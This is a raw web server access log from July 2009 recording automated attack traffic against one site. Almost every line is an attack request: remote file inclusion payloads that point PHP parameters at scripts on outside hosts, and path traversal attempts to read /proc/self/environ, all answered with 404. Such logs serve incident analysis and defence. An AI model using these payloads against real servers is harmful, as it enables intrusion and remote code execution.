88.191.37.60 - - [04/Jul/2009:19:35:34 -0700] "GET /allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:35:34 -0700] "GET /logs/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:35:39 -0700] "GET /logs/access.log/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:19:36:23 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:19:36:26 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:19:37:34 -0700] "GET /logs/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:19:37:34 -0700] "GET /htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:19:37:39 -0700] "GET /logs/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:19:37:39 -0700] "GET /htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:57 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:57 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:57 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:57 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:58 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:58 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:58 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:58 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:37:58 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:38:47 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:38:47 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:38:47 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:19:39:15 -0700] "GET /logs/errors.php?error=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:19:39:15 -0700] "GET /logs/access.log/errors.php?error=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:19:39:15 -0700] "GET /errors.php?error=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:18 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:18 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:18 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:37 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:37 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:39:37 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:40:47 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:19:41:23 -0700] "GET /logs/access_090521.log/errors.php?error=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:27 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:27 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:27 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:43 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:53 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:41:53 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:42:43 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:19:42:44 -0700] "GET /logs/access_090521.log%20/errors.php?error=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:42:56 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:42:58 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:43:29 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:43:29 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:43:34 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:46:26 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:46:26 -0700] "GET /logs/access.log/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:46:26 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:46:28 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:19:46:59 -0700] "GET /logs/access.log/index.php?absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:19:46:59 -0700] "GET /logs/index.php?absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:19:46:59 -0700] "GET /index.php?absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:48:08 -0700] "GET /index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:48:08 -0700] "GET /logs/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:48:08 -0700] "GET /logs/access.log/index.php?absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:48:10 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:48:10 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:48:10 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:19:50:08 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:51:13 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:51:13 -0700] "GET /logs/access.log/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:51:14 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:52:18 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:53:37 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:19:54:17 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:15 -0700] "GET /modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:15 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:15 -0700] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
62.119.28.103 - - [04/Jul/2009:20:04:31 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:46 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:04:46 -0700] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:24 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:29 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:35 -0700] "GET /htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:35 -0700] "GET /logs/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:41 -0700] "GET /htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
190.54.28.163 - - [04/Jul/2009:20:06:41 -0700] "GET /logs/htmltonuke.php?filnavn=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 275 "-" "XXXXXX" "hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:07:07 -0700] "GET /_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:07:07 -0700] "GET /logs//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:07:07 -0700] "GET /logs/access.log//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:38 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:38 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:38 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:47 -0700] "GET /logs/access.log/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:47 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:08:47 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:09:42 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:20:12:07 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.151.217.29 - - [04/Jul/2009:20:12:47 -0700] "GET /logs/access.log%20%20//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:13:03 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:13:03 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:13:04 -0700] "GET /logs/access.log/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:14:20 -0700] "GET /logs/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:14:20 -0700] "GET /index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:20:14:20 -0700] "GET /logs/access.log/index.php?absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:17:56 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:17:56 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:17:56 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:19:43 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:19:43 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:19:43 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.40.150.211 - - [04/Jul/2009:20:20:07 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.40.150.211 - - [04/Jul/2009:20:20:07 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.40.150.211 - - [04/Jul/2009:20:20:07 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:21:41 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:21:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:20:21:44 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.71.241.146 - - [04/Jul/2009:20:21:53 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
